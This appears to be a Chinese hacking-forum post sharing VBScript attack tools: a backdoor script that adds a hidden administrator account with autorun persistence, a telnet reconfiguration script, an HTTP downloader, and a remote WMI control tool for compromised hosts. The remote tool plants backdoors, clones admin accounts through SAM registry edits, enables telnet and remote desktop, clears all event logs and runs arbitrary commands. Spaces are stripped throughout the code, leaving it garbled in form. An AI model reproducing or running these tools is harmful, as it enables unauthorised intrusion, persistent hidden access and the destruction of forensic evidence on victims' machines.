1.door.vbs
'***************
'door.vbsby黑嘿黑
'***************
dimwsh,FA,FSO
setfso=CreateObject("Scripting.FileSystemObject")
SetFA=FSO.GetFile(WScript.scriptFullName)
FA.Attributes=34
setwsh=CreateObject("WScript.Shell")
wsh.run"netuserIUSE_SERVERxyhack.91i.net/add",0,true
wsh.run"netlocalgroupadministratorsIUSE_SERVER/add",0,true
wsh.Regwrite"HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32",""&FA&""
wsh.Regwrite
"HKLMSoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALLCheckedValue",0,"REG_DWORD"
wsh.regwrite"HKEY_LOCAL_MACHINESoftwareMicrosoftCommandProcessorAutoRun",""&FA&""
wsh.regwrite"HKEY_CURRENT_USERSoftwareMicrosoftCommandProcessorAutoRun",""&FA&""
功能:添加不死帐号(随cmd启动而启动),在win下彻底隐藏。
使用:直接运行。
2.ntlm.vbs
'***************
'ntlm.vbsby黑嘿黑
'***************
dimwsh
setwsh=CreateObject("WScript.Shell")
wsh.regwrite"HKLMSoftwareMicrosoftTelnetServer1.0NTLM",WScript.Arguments(0),"REG_DWORD"
wsh.regwrite"HKLMSoftwareMicrosoftTelnetServer1.0TelnetPort",WScript.Arguments(1),"REG_DWORD"
功能:自定义telnet的ntml和端口。
使用:D:>ntml.vbs1999
3.iget.vbs
'***************************
'iget.vbsModby黑嘿黑
'***************************
SetxPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open"GET",LCase(WScript.Arguments(0)),0
xPost.Send()
SetsGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFileLCase(WScript.Arguments(1)),2
功能:命令行下下载http文件。
使用:D:>iget.vbshttp://xyhack.91i.net/vbs.rarvbs.rar
4.rcmd.vbs
'***************
'rcmd.vbsby黑嘿黑
'***************
onerrorresumenext
setoutstreem=wscript.stdout
setinstreem=wscript.stdin
if(lcase(right(wscript.fullname,11))="wscript.exe")then
setobjShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe/kcscript//nologo"&chr(34)&wscript.scriptfullname&chr(34))
endif
ifwscript.arguments.count<3then
usage()
wscript.echo"Notenoughparameters."
wscript.quit
endif
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
usage()
outstreem.write"Conneting"&ipaddress&"...."
setobjlocator=createobject("wbemscripting.swbemlocator")'20
setobjswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
objswbemservices.security_.privileges.add23,true
objswbemservices.security_.privileges.add18,true
objswbemservices.security_.privileges.add7,true
objswbemservices.security_.privileges.add11,true
iferrornumber<>0then
wscript.echo"Error!"
callmain()
else
wscript.echo"OK!"
endif
callmain()
'***********************************************************
functiondoor()
outstreem.write"Creatingtheblankdoor.."
setobjinstproc=objswbemservices.get("win32_process")
cmddoor="cmd/cechodimwsh,FA,FSO,t>%windir%system32svrer.vbs"_
&"&&echosetfso=CreateObject(""Scripting.FileSystemObject"")>>%windir%system32svrer.vbs"_
&"&&echoSetFA=FSO.GetFile(WScript.scriptFullName)>>%windir%system32svrer.vbs"_
&"&&echoFA.Attributes=34>>%windir%system32svrer.vbs"_
&"&&echosett=fso.CreateTextFile(""%windir%system32SYSTEM.bat"",true)>>%windir%system32svrer.vbs"_
&"&&echot.WriteLine(""netuserIUSE_SERVERxyhack.91i.net/add"")>>%windir%system32svrer.vbs"_
&"&&echot.WriteLine(""netlocalgroupadministratorsIUSE_SERVER/add"")>>%windir%system32svrer.vbs"_
&"&&echot.WriteLine(""Attrib+h%windir%system32SYSTEM.bat"")>>%windir%system32svrer.vbs"_
&"&&echot.Close>>%windir%system32svrer.vbs"_
&"&&echosetwsh=CreateObject(""WScript.Shell"")>>%windir%system32svrer.vbs"_
&"&&echowsh.run""netuserIUSE_SERVERxyhack.91i.net/add"",0,true>>%windir%system32svrer.vbs"_
&"&&echowsh.run""netlocalgroupadministratorsIUSE_SERVER/add"",0,true>>%windir%system32svrer.vbs"_
&"&&echowsh.Regwrite
""HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32"",""%windir%system32svrer.vbs"">>%windir%system32svrer.vbs"_
&"&&echowsh.Regwrite
""HKLMSoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALLCheckedValue"",0,""REG_DWORD"">>%win
dir%system32svrer.vbs"_
&"&&echowsh.regwrite""HKEY_LOCAL_MACHINESoftwareMicrosoftCommand
ProcessorAutoRun"",""%windir%system32svrer.vbs"">>%windir%system32svrer.vbs"_
&"&&echowsh.regwrite""HKEY_CURRENT_USERSoftwareMicrosoftCommand
ProcessorAutoRun"",""%windir%system32svrer.vbs"">>%windir%system32svrer.vbs"_
&"&&echowsh.run""cmd/cat20:00,20:10,20:20,20:30%windir%system32SYSTEM.bat"",0,true
>>%windir%system32svrer.vbs"
objinstproc.create(cmddoor)
showerror(err.number)
Wscript.Sleep(1500)
outstreem.write"Runingtheblankdoor.."
objinstproc.create("cmd/ccscript%windir%system32svrer.vbs")
showerror(err.number)
callmain()
endfunction
'***********************************************************
functionca()
Wscript.Echo"enterthecausername:"
causername=WScript.StdIn.Readline()
Wscript.Echo"enterthecapassword:"
capassword=WScript.StdIn.Readline()
outstreem.write"GettingSIDof"&causername&"...."
setcolinstsid=objswbemservices.execquery("select*fromwin32_useraccountwherename="&chr(34)&causername&chr(34))
foreachobjinstsidincolinstsid
strsid=objinstsid.sid
sidflag=right(strsid,len(strsid)-instrrev(strsid,"-"))
strflag=cstr(hex(sidflag))
regname=string(8-len(strflag),"0")&strflag
next
ifstrsid=""then
wscript.echo"Error."&vbcrlf&"Usernameisnotexist."
callmain()
else
wscript.echo"OK!"
endif
outstreem.write"Prepairing.."
setobjinstproc=objswbemservices.get("win32_process")
showerroronly(err.number)
cmdline="cmd/cechosetoreg=getobject(""winmgmts:rootdefault:stdregprov"")>%temp%ca.vbs"_
&"&&echooreg.getbinaryvalue^&h80000002,""SAMSAMDomainsAccountUsers00001F4"",""F"",uvalue>>%temp%ca.vbs"_
&"&&echooreg.setbinaryvalue^&h80000002,""SAMSAMDomainsAccountUsers"?name&""",""F"",uvalue>>%temp%ca.vbs"_
&"&&echosetsh=createobject(""wscript.shell"")>>%temp%ca.vbs"_
&"&&echosh.regwrite""HKLMSOFTWAREMicrosoftWindowsScriptHostSettingscaflag"",""1"">>%temp%ca.vbs"
objinstproc.create(cmdline)
showerroronly(err.number)
cmdline="cmd/cechoatime=time>%temp%getsys.vbs"_
&"&&echosetsh=createobject(""wscript.shell"")>>%temp%getsys.vbs"_
&"&&echosh.run""cmd/cat23:59cscript%temp%ca.vbs"",0,true>>%temp%getsys.vbs"_
&"&&echosh.run""cmd/ctime23:58:59.90"",0,true>>%temp%getsys.vbs"_
&"&&echowscript.sleep(1100)>>%temp%getsys.vbs"_
&"&&echosh.run""cmd/ctime""^&atime,0,true>>%temp%getsys.vbs"
objinstproc.create(cmdline)
showerror(err.number)
outstreem.write"Processing."
setcolinstsvr=objswbemservices.execquery("select*fromwin32_servicewherename='schedule'")
showerroronly(err.number)
foreachobjinstsvrincolinstsvr
flag1=0
flag2=0
ifobjinstsvr.startmode="Disabled"then
objinstsvr.changestartmode("Manual")
flag1=1
endif
ifobjinstsvr.started=flasethen
errnumber=objinstsvr.startservice()
flag2=1
endif
showerroronly(err.number)
objinstproc.create("cmd/ccscript%temp%getsys.vbs")
showerroronly(err.number)
setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
fori=1to20
objinstreg.getstringvalue&h80000002,"SOFTWAREMicrosoftWindowsScriptHostSettings","caflag",svalue
ifsvalue="1"then
exitfor
else
wscript.sleep(500)
endif
next
objinstproc.create("netuser"&causername&""&capassword)
ifflag1thenobjinstsvr.changestartmode("Disabled")
ifflag2thenobjinstsvr.stopservice()
next
ifsvalue<>"1"then
wscript.echo"Error."&vbcrlf&"Waitingtimeout."
else
showerror(err.number)
endif
outstreem.write"CleanUp.."
objinstproc.create("cmd/cdel%temp%ca.vbs")
showerroronly(err.number)
objinstproc.create("cmd/cdel%temp%getsys.vbs")
showerroronly(err.number)
ifsvalue="1"thenobjinstreg.deletevalue&h80000002,"SOFTWAREMicrosoftWindowsScriptHostSettings","caflag"
showerror(err.number)
callmain()
endfunction
functionshowerroronly(errornumber)
iferrornumberThen
wscript.echo"Error0x"&cstr(hex(err.number))&"."
iferr.description<>""then
wscript.echo"Errordescription:"&err.description&"."
endif
callmain()
else
outstreem.write"."
endif
endfunction
'***********************************************************
functionshare()
Wscript.Echostring(18,"-")
Wscript.Echo"0.返回CMD>="
wscript.echo"1.列出共享信息:="
Wscript.Echo"2.创建共享="
Wscript.Echo"3.删除共享="
Wscript.Echostring(18,"-")
Wscript.Echo"pleasechosetheparameter:"
parameters=WScript.StdIn.Readline()
SelectCaseparameters
case"quit","0"
main()
case"list","1"
listshare()
case"open","2"'40
openshare()
case"close","3"
closeshare()
endSelect
endfunction
functionlistshare()
outstreem.write"ListingtheNetsharefrom"&ipaddress&"...."
SetcolShares=objswbemservices.ExecQuery("Select*fromWin32_Share")
showerror(err.number)'50
wscript.echo_
("Caption"&chr(9)&chr(9)&"Name:"&chr(9)&chr(9)&"Path")
ForeachobjShareincolShares
wscript.echo_
(objShare.Caption&chr(9)&objShare.Name&chr(9)&chr(9)&objShare.Path)
Next
wscript.echovbcrlf&"AllSharehavebeenlistedSuccessfully!"
callshare()
endfunction
functionopenshare()
wscript.echo"Enterthepath:"'70
path=WScript.StdIn.Readline()
wscript.echo"Enterthename:"
sname=WScript.StdIn.Readline()
ConstFILE_SHARE=0
ConstMAXIMUM_CONNECTIONS=25
SetobjNewShare=objswbemservices.Get("Win32_Share")
errReturn=objNewShare.Create_
(path,sname,FILE_SHARE,_
MAXIMUM_CONNECTIONS,"默认共享")
wscript.echo"ThenSharehavebeenCeatedSuccessfully!"
callshare()
endfunction
functioncloseshare()
wscript.echo"PleseEnterThename:"
kname=WScript.StdIn.Readline()
outstreem.write"killingthe"&kname&"...."
SetcolShares=objswbemservices.ExecQuery_
("Select*fromWin32_ShareWhereName="&"'"&kname&"'")
ForEachobjShareincolShares
objShare.Delete
Next
showerror(err.number)
callshare()
endfunction
'***********************************************************
functionlistsvr()
outstreem.write"ListingtheServicefrom"&ipaddress&"...."
SetcolListOfServices=objswbemservices.ExecQuery_
("Select*fromWin32_Service")
showerror(err.number)
wscript.echo_
("Name"&chr(9)&chr(9)&"State"&chr(9)&chr(9)&"Mode"&chr(9)&"PathName")
ForEachobjServiceincolListOfServices
iflen(objService.name)<8then
strname=objService.name&chr(9)
else
strname=objService.name
endif
wscript.echo_
(strname&chr(9)&objService.State&chr(9)&chr(9)&objService.StartMode&chr(9)&objService.PathName)
Next
wscript.echovbcrlf&"AllServiceshavebeenlistedSuccessfully!"
callmain()
endfunction
'************************************************************
functionreboot()
outstreem.write"Now,restartingtarget...."
strwqlquery="select*fromwin32_operatingsystemwhereprimary='true'"
setcolinstances=objswbemservices.execquery(strwqlquery)
foreachobjinstanceincolinstances
objinstance.win32shutdown(6)
next
showerror(err.number)
callmain()
endfunction
'*************************************************************
functioninf()
outstreem.write"GettingInfomationfrom"&ipaddress&"...."
setobj1=objget("win32_computersystem")
showerror(err.number)
wscript.echo""&vbcrlf
setobj2=objget("win32_operatingsystem")
setcol3=objswbemservices.instancesof("win32_processor")
setobj4=objget("win32_logicalmemoryconfiguration")
setobj5=objget("win32_bios")
setobj6=objget("win32_displayconfiguration")
setcol7=objswbemservices.instancesof("win32_diskdrive")
setcol8=objswbemservices.instancesof("win32_logicaldisk")
setcol9=objswbemservices.instancesof("win32_networkadapterconfiguration")
setcol10=objswbemservices.instancesof("win32_quickfixengineering")
wnl"OSInfo:"
wnl"ComputerName:"&obj1.name
wnl"UserName:"&obj1.username
wnl"Domain:"&obj1.domain
domainrole=""
selectcaseobj1.domainrole
case0
domainrole="Workstation"
case1
domainrole="MemberWorkstation"
case2
domainrole="Server"
case3
domainrole="MemberServer"
case4
domainrole="BackupDomainController"
case5
domainrole="MainDomainController"
endselect
withobj2
wnl"DomainRole:"&domainrole
wnl"Caption:"&.caption
wnl"Organization:"&.organization
wnl"RegisteredUser:"&.registereduser
wnl"InstallDate:"&timeformat(.installdate)
wnl"LastBootUpTime:"&timeformat(.lastbootuptime)
wnl"WindowsDirectory:"&.windowsdirectory
wnl"SystemDirectory:"&.systemdirectory
wnl"BootDevice:"&.bootdevice
wnl"CountryCode:"&.countrycode
wnl"CSName:"&.csname
wnl"Description:"&.description
wnl"Manufacturer:"&.manufacturer
wnl"SerialNumber:"&.serialnumber
wnl"Version:"&.version
wnl"SystemType:"&obj1.systemtype
wnl"SystemStartupDelay:"&obj1.systemstartupdelay&"s"
wnl"SystemStartupOptions:"&obj1.systemstartupoptions(0)
fori=1toubound(obj1.systemstartupoptions)
wnlspace(28)&obj1.systemstartupoptions(i)
next
endwith
wnlvbcrlf&"ProcessorInfo:"
wnl"NumberOfProcessors:"&obj1.numberofprocessors
foreachobj3incol3
withobj3
wnl"DeviceID:"&.deviceid
wnl"Name:"&.name
wnl"CurrentClockSpeed:"&.currentclockspeed&"MHz"
wnl"Description:"&.description
wnl"ExtClock:"&.extclock&"MHz"
wnl"L2CacheSize:"&.l2cachesize&"KB"
wnl"L2CacheSpeed:"&.l2cachespeed&"MHz"
wnl"ProcessorId:"&.processorid
wnl"Manufacturer:"&.manufacturer
wnl"SocketDesignation:"&.socketdesignation
wnl"AddressWidth:"&.addresswidth&"Bit"
wnl"DataWidth:"&.datawidth&"Bit"
endwith
next
withobj4
wnlvbcrlf&"MemoryInfo:"
wnl"TotalPhysicalMemory:"&cint(.totalphysicalmemory/1024)&"MB"
wnl"FreePhysicalMemory:"&cint(obj2.freephysicalmemory/1024)&"MB"
wnl"TotalPageFileSpace:"&cint(.totalpagefilespace/1024)&"MB"
wnl"TotalVirtualMemory:"&cint(.totalvirtualmemory/1024)&"MB"
wnl"AvailableVirtualMemory:"&cint(.availablevirtualmemory/1024)&"MB"
endwith
wnlvbcrlf&"BIOSInfo:"
wnl"Description:"&obj5.description
wnl"CurrentLanguage:"&obj5.currentlanguage
wnl"Version:"&obj5.version
wnl"Manufacturer:"&obj5.manufacturer
withobj6
wnlvbcrlf&"DisplayConfiguration:"
wnl"Caption:"&.caption
wnl"DeviceName:"&.devicename
wnl"DriverVersion:"&.driverversion
wnl"DisplayFrequency:"&.displayfrequency&"Hz"
wnl"BitsPerPel:"&.bitsperpel&"Bit"
wnl"Pels:"&.pelswidth&"x"&.pelsheight
endwith
wnlvbcrlf&"DiskInfo:"
foreachobj7incol7
withobj7
wnl"DeviceID:"&.deviceid
wnl"Caption:"&.caption
wnl"InterfaceType:"&.interfacetype
wnl"SCSIBus:"&.scsibus
wnl"SCSILogicalUnit:"&.scsilogicalunit
wnl"SCSIPort:"&.scsiport
wnl"SCSITargetId:"&.scsitargetid
wnl"SectorsPerTrack:"&.sectorspertrack&"KB"
wnl"Partitions:"&.partitions
wnl"Size:"&sizeformat(.size)
endwith
next
str="Volume"+space(2)+"Type"+space(8)+"Format"+space(4)
str=str+"Size"+space(6)+"Free"+space(12)+"Label"
wnlstr
foreachobj8incol8
withobj8
drivetype=""
selectcase.drivetype
case0
drivetype="Unknow"
case1
drivetype="NoRootDir"
case2
drivetype="Removable"
case3
drivetype="Fixed"
case4
drivetype="Network"
case5
drivetype="CD-ROM"
case6
drivetype="RAM"
endselect
strpercent=""
if.size<>""and.freespace<>""then
strpercent="("&formatpercent(.freespace/.size,0)&")"
endif
str=""&wsp(.caption,8)&wsp(drivetype,12)&wsp(.filesystem,10)&wsp(sizeformat(.size),10)
str=str&wsp(sizeformat(.freespace)&strpercent,16)&.volumename
wnlstr
endwith
next
wnlvbcrlf&"NICInformaton:"
foreachobj9incol9
withobj9
if.IPEnabledthen
wnl"Index:"&.index
wnl"Description:"&.description
wnl"DHCPEnabled:"&.dhcpenabled
wnl"DHCPServer:"&.dhcpserver
wnl"DNSHostName:"&.dnshostname
wnl"DNSServerSearchOrder:"&wfl(.dnsserversearchorder)
wnl"WINSPrimaryServer:"&.winsprimaryserver
wnl"IPAddress:"&wfl(.ipaddress)
wnl"MACAddress:"&.macaddress
wnl"DefaultIPGateway:"&wfl(.defaultipgateway)
wnl"IPSubnet:"&wfl(.ipsubnet)
wnl"IPFilterSecurityEnabled:"&.ipfiltersecurityenabled
wnl"IPSecPermitIPProtocols:"&wfl(.ipsecpermitipprotocols)
wnl"IPSecPermitTCPPorts:"&wfl(.ipsecpermittcpports)
wnl"IPSecPermitUDPPorts:"&wfl(.ipsecpermitudpports)
endif
endwith
next
wnlvbcrlf&"HotFixesInfo:"
foreachobj10incol10
wnl"HotFixID:"&obj10.hotfixid
wnl"FixComments:"&obj10.fixcomments
wnl"InstallDate:"&obj10.installdate
wnl"ServicePackInEffect:"&obj10.servicepackineffect
next
wnlvbcrlf&"Applications:"
setobjswb1=objlocator.connectserver(ipaddress,"root/default",username,password)
setobj11=objswb1.get("stdregprov")
HKLM=&h80000002
keypath="SOFTWAREMicrosoftWindowsCurrentVersionUninstall"
obj11.enumkeyHKLM,keypath,keyarray
redimstr(ubound(keyarray)+1)
j=0
fori=0toubound(keyarray)
obj11.getstringvalueHKLM,keypath+keyarray(i),"displayname",strvalue
ifstrvalue<>""then
str(j)=strvalue
j=j+1
endif
next
ifj>1then
fori=0toj-1
fork=0toj-i-1
ifstrcomp(str(k),str(k+1),1)=1then
strtemp=str(k+1)
str(k+1)=str(k)
str(k)=strtemp
endif
next
next
endif
fori=0toj-1
wnl""&str(i)
next
wscript.echo""&vbcrlf
wscript.echo"TheInfomationfrom&ipaddress&hadbeenlistedSuccessfully!"
callmain()
endfunction
subwnl(msg)
wscript.echomsg
ifisobject(of)then
onerrorresumenext
of.writelinemsg
showerror()
onerrorgoto0
endif
endsub
functionwfl(byrefobj)
str=""
fori=0toubound(obj)
str=str&obj(i)&""
next
wfl=str
endfunction
functionwsp(msg,num)
ifmsg<>""then
msg=left(msg,num-1)
wsp=msg&space(num-len(msg))
else
wsp=space(num)
endif
endfunction
functiontimeformat(msg)
timeformat=left(msg,4)&"/"&mid(msg,5,2)&"/"&mid(msg,7,2)&""&mid(msg,9,2)&":"&mid(msg,11,2)&":"&mid(msg,13,2)
endfunction
functionsizeformat(msg)
ifmsg<>""then
size=msg/1048576
ifsize>1024then
sizeformat=round(size/1024,2)&"GB"
else
sizeformat=round(size,1)&"MB"
endif
endif
endfunction
functionobjget(msg)
setcol=objswbemservices.instancesof(msg)
foreachobjxincol
setobj=objx
next
setobjget=obj
endfunction
'******************************************
functioncommand()
wscript.echo"PleseEnterTheCommand:"
callrun()
endfunction
functionrun()
strcmdline=WScript.StdIn.Readline()
ifstrcmdline="exit"orstrcmdline="quit"orstrcmdline="0"then
callmain()
endif
outstreem.write"Runningthecommand...."
setobjinstance=objswbemservices.get("win32_process")
setobjmethod=objinstance.methods_("create")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.commandline=strcmdline
setobjoutparam=objinstance.execmethod_("create",objinparam)
ifobjoutparam.returnvalue<>0then
wscript.echo"Error!"
callcommand()
else
wscript.echo"OK!"
endif
wscript.echo"TheProcessIDis"&objoutparam.processid
wscript.echo"Runingcommand:"&strcmdline&".to"&ipaddress&"Successfully!"&vbcrlf
callcommand()
endfunction
'*******************************************
functionpslist()
outstreem.write"Listingprocess...."
setcolinstances=objswbemservices.execquery("select*fromwin32_process")
showerror(err.number)
wscript.echovbcrlf&"Name"&chr(9)&chr(9)&"Pid"&chr(9)&"ExecutablePath"
foreachobjinstanceincolinstances
iflen(objinstance.name)<8then
strname=objinstance.name&chr(9)
else
strname=objinstance.name
endif
wscript.echostrname&chr(9)&objinstance.handle&chr(9)&objinstance.executablepath
next
wscript.echovbcrlf&"AllprocesshavebeenlistedSuccessfully!"
callmain()
endfunction
'*****************************************
functionpskill()
wscript.echo"pleseentertheprocess'sid:"
strprocess=WScript.StdIn.Readline()
outstreem.write"Killingid="&strprocess&"process...."
setobjinstance=objswbemservices.get("win32_process.handle="&"'"&strprocess&"'")
ifvartype(objinstance)<>vbobjectthen
wscript.echovbcrlf&"Specifiedprocessisnotexist."
callmain()
else
setobjmethod=objinstance.methods_("terminate")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.reason=0
setobjoutparam=objinstance.execmethod_("terminate",objinparam)
showerror(objoutparam.returnvalue)
wscript.echo"Theprocess'sid="&strprocess&"havebeenkilledSuccessfully!"
endif
callmain()
endfunction
'********************************************************
functiontelnet()
outstreem.write"Queryingstateoftelnetserver...."
setobjswbemservices=objlocator.connectserver(ipaddress,"rootcimv2",username,password)
setcolinstances=objswbemservices.execquery("select*fromwin32_servicewherename='tlntsvr'")
showerror(err.number)
foreachobjinstanceincolinstances
ifobjinstance.startmode="Disabled"then
outstreem.write"Telnetserverhasbeendisabled.Nowchangeingstartmodetomanual...."
setobjmethod=objinstance.methods_("changestartmode")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode="Manual"
setobjoutparam=objinstance.execmethod_("changestartmode",objinparam)
showerror(objoutparam.returnvalue)
endif
outstreem.write"Changeingstate...."
ifobjinstance.started=truethen
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo"TargettelnetserverhasbeenSTOPSuccessfully."
else
showerror(intstatus)
wscript.echo"pleseenterthentlm:"
ntlm=WScript.StdIn.Readline()
wscript.echo"pleseentertheport:"
port=WScript.StdIn.Readline()
ifnotisnumeric(ntlm)orntlm<0orntlm>2then
wscript.echo"ThevalueofNTMLiswrong."
callmain()
endif
ifnotisnumeric(port)then
wscript.echo"Thevalueofportiswrong."
main()
endif
setobjswbemservices1=objlocator.connectserver(ipaddress,"root/default",username,password)
outstreem.write"SettingNTLM="&ntlm&"...."
setobjinstance1=objswbemservices1.get("stdregprov")
setobjmethod=objinstance1.methods_("SetDWORDvalue")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname="SOFTWAREMicrosoftTelnetServer1.0"
objinparam.svaluename="NTLM"
objinparam.uvalue=ntlm
setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)
outstreem.write"Settingport="&port&"...."
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port
setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)
intstatus=objinstance.startservice()
wscript.echo"TargettelnetserverhasbeenSTARTSuccessfully!"
wscript.echo"Now,youcantry:telnet"&ipaddress&""&port&",togetashell."
endif
next
callmain()
endfunction
'********************************************************
functionrs()
outstreem.write"CheckingTheOSType...."
setcolinstoscaption=objswbemservices.execquery("selectcaptionfromwin32_operatingsystem")
foreachobjinstoscaptionincolinstoscaption
ifinstr(objinstoscaption.caption,"Server")>0then
wscript.echo"OK!"
else
wscript.echo"OK!"
wscript.echo"OSTypeis"&objinstoscaption.caption
wscript.echo"youcann'topenterminalservices,canceling...."&chr(13)'60
callmain()
endif
next
wscript.echo"pleseentertheport:"
port=WScript.StdIn.Readline()
ifnotisnumeric(port)orport<1orport>65000then'50
wscript.echo"Thenumberofportiserror."
callmain()
endif
outstreem.write"Writingintoregistry...."
setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
withobjinstreg
.createkey,"SOFTWAREMicrosoftWindowsCurrentVersionnetcache"
.setdwordvalueHKLM,"SOFTWAREMicrosoftWindowsCurrentVersionnetcache","Enabled",0'70
.createkeyHKLM,"SOFTWAREPoliciesMicrosoftWindowsInstaller"
.setdwordvalueHKLM,"SOFTWAREPoliciesMicrosoftWindowsInstaller","EnableAdminTSRemote",1
.setdwordvalueHKLM,"SYSTEMCurrentControlSetControlTerminalServer","TSEnabled",1
.setdwordvalueHKLM,"SYSTEMCurrentControlSetServicesTermDD","Start",2
.setdwordvalueHKLM,"SYSTEMCurrentControlSetServicesTermService","Start",2
.setstringvalueHKLM,".DEFAULTKeyboardLayoutToggle","Hotkey","1"
.setdwordvalueHKLM,"SYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp","PortNumber",port
endwith
showerror(err.number)
wscript.echo"Now,youneedtoreboottarget!"
wscript.echo"Doyouwanttoreboottargetnow?[y/n]"
strcancel=WScript.StdIn.Readline()
ifstrcancel="n"then
wscript.echo"youneedtoreboottargetthen!!"
callmain()
else
callreboot()
endif
wscript.echo"Youcanlogonterminalserviceson"&port&"later,Goodluck!"
callmain()
endFunction
'**************************************************************
functionclog()
outstreem.write"Clearingalllogs...."
strwqlquery="select*fromWin32_NTEventLogFile"
setcolinstances=objswbemservices.execquery(strwqlquery,"wql",&h20)
foreachobjinstanceincolinstances
ifobjinstance.cleareventlog()<>0then
wscript.echo"Error!"'100
callmain()
endif
next
wscript.echo"OK!"
wscript.echo"AlllogshavebeenclearedSuccessfully!"
callmain()
endfunction
'***************************************************************
functionshowerror(errornumber)
iferrornumberThen
wscript.echo"Error0x"&cstr(hex(err.number))&"."
iferr.description<>""then
wscript.echo"Errordescription:"&err.description&"."
endif
callmain()
else
wscript.echo"OK!"
endif
endfunction
'*****************************************************************
functionusage()
wscript.echostring(79,"*")
wscript.echo"RCMDv1.05"
wscript.echo"RemoteexecutionScript,by黑嘿黑"
wscript.echo"Welcometovisitewww.xyhack.91i.net"
wscript.echo"QQ:123230273E-mail:cnhacker521@hotmail.com"
wscript.echo"Usage:"
wscript.echo"cscript"&wscript.scriptfullname&"targetIPusernamepassword"
wscript.echo"Thenchosethecommand>"
wscript.echostring(79,"*")
endfunction
'**********************************************************
functionmain()
wscript.echo""
wscript.echo"Nowchosethecommand>"
wscript.echo"0.quit退出脚本"
wscript.echo"1.telnet远程开/关telnet"
wscript.echo"2.3389远程开3389"
wscript.echo"3.clog远程删除所有日志"
wscript.echo"4.getf获取肉鸡系统信息"
wscript.echo"5.pslist例出进程"
wscript.echo"6.pskill删除进程"
wscript.echo"7.command远程执行DOS命令"
wscript.echo"8.reboot远程重启肉鸡"
wscript.echo"9.slist例出远程肉鸡上的服务信息"
wscript.echo"A.Share1.列出共享2.创建共享3.删除共享"
wscript.echo"B.ca克隆帐号"
wscript.echo"C.Door种植后门"
wscript.echostring(79,"*")
wscript.echo"CMD>"
cmd=WScript.StdIn.Readline()
wscript.echo""
SelectCasecmd
case"telnet","1"
telnet()
case"3389","2"
rs()
case"clog","3"
clog()
case"getf","4"
inf()
case"psl","pslist","5"
pslist()
case"psk","pskill","6"
pskill()
case"cmd","command","7"
command()
case"reboot","8"
reboot()
case"slist","9"
listlistsvr()
case"share","10","a","A"
share()
case"B","b","11"
ca()
case"C","c","12"
door()
case"quit","0"
wscript.quit
endselect
endfunction
标签: